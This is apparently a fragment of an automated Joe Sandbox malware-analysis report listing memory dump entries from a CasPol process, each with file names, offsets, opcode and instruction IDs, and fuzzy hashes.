                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 4944502930568d09a3391abc3b334b3886eab51b70bd21416cf7ab280031f482
                                    • Instruction ID: bf95e0e5ecd31413f301505b19ca32e046f12b1377f5d0fdec51a65603062cb8
                                    • Opcode Fuzzy Hash: 4944502930568d09a3391abc3b334b3886eab51b70bd21416cf7ab280031f482
                                    • Instruction Fuzzy Hash: 7CE0ED3AF001149BCF05E7B8E55499DB7F1ABC82687208165D509E7324EE399E0287A1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 12cf16027d1fcde484a58f65e575eb61c33b81203fd49eddbf95e4ffb95cfdd3
                                    • Instruction ID: 440cc5f55ad3699f943337957220c727881ee342ad0de06bbf37dec0f587ca1e
                                    • Opcode Fuzzy Hash: 12cf16027d1fcde484a58f65e575eb61c33b81203fd49eddbf95e4ffb95cfdd3
                                    • Instruction Fuzzy Hash: 25E0ED3AF011149BCF05E7B8E59499DB7F1AB882687208169D509E7724EE399E028791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 79132f998ebc8a397b62ad9860e7d1d2b16926b344f6f5c08518074b64ad16d9
                                    • Instruction ID: 09b789d216e1a9a963428effda6e43c37fa02350cad1baa5467b68c897ad8b72
                                    • Opcode Fuzzy Hash: 79132f998ebc8a397b62ad9860e7d1d2b16926b344f6f5c08518074b64ad16d9
                                    • Instruction Fuzzy Hash: D3E0ED3AF001149BCF05E7B8E65499DB7F1AF892687208165D509E7324EE399E028791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f8812df30cc33fdf240c2fd0c7a0220bbe9e3dd3bf0bbfc782ac1e605946c5a4
                                    • Instruction ID: 709f80fac12ca129a7f8196115c77123f2738370be63c0cfcce90988c99cff58
                                    • Opcode Fuzzy Hash: f8812df30cc33fdf240c2fd0c7a0220bbe9e3dd3bf0bbfc782ac1e605946c5a4
                                    • Instruction Fuzzy Hash: CCE0ED3AF001148BCF05E7B8E55499DB7F5BB882687209165D509E7324EF399E018751
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: fc8701577ad5c221d7cc8d85d980f73c7a1a587615768028d919b58dafc3abef
                                    • Instruction ID: 33791f569d2e5b2ef9440a8e5a4ef5f980294199d69d19550d946d58febe7a87
                                    • Opcode Fuzzy Hash: fc8701577ad5c221d7cc8d85d980f73c7a1a587615768028d919b58dafc3abef
                                    • Instruction Fuzzy Hash: 41E0ED3AF001148BCF05E7B8E65499DBBF1AB8826872081A9D509E7764EF399E018791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: efcce26893e6fd14b4bee65a4dc28d47d9f6cb5cb642fd303c3c918dd8428ca8
                                    • Instruction ID: eec56fabd66d1ab8c8a8f76ffecf0d73ee784263b8be47b785c3a0dae2ea445e
                                    • Opcode Fuzzy Hash: efcce26893e6fd14b4bee65a4dc28d47d9f6cb5cb642fd303c3c918dd8428ca8
                                    • Instruction Fuzzy Hash: CEE0ED3AF001148BCF05E7B8E65499DB7F1AB882687208169D509E7324EE39AE018791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91148380986.00000000203B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 203B0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_203b0000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: d7a76e5dd3b079e2ae9ec46d671aea4d8477b23cf34f497fea550f4da16a6ff9
                                    • Instruction ID: 58b9dcc3e935ccdddcf147975e846f077f205311e94881a2bb8bcd6fb5310d0f
                                    • Opcode Fuzzy Hash: d7a76e5dd3b079e2ae9ec46d671aea4d8477b23cf34f497fea550f4da16a6ff9
                                    • Instruction Fuzzy Hash: D7E0ED3AF001148BCF05E7B8F55499DB7F1BB882687208465D509E7324EE39AE018761
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.91143986376.000000001FA00000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FA00000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_12_2_1fa00000_CasPol.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 39286dfbe0d16bb4a37394b10e20d7ef5aae2a7cdcc7931f3f94e2eae4068abb
                                    • Instruction ID: 701fa827a2fefc7f8e176c1c8e6c7391c96e4154e1f8975f724bf652246d0cc1
                                    • Opcode Fuzzy Hash: 39286dfbe0d16bb4a37394b10e20d7ef5aae2a7cdcc7931f3f94e2eae4068abb
                                    • Instruction Fuzzy Hash: F9B0122216121F43DA1033EDE485338776C5F805C8F400075D909439434D4538815472
                                    Uniqueness

                                    Uniqueness Score: -1.00%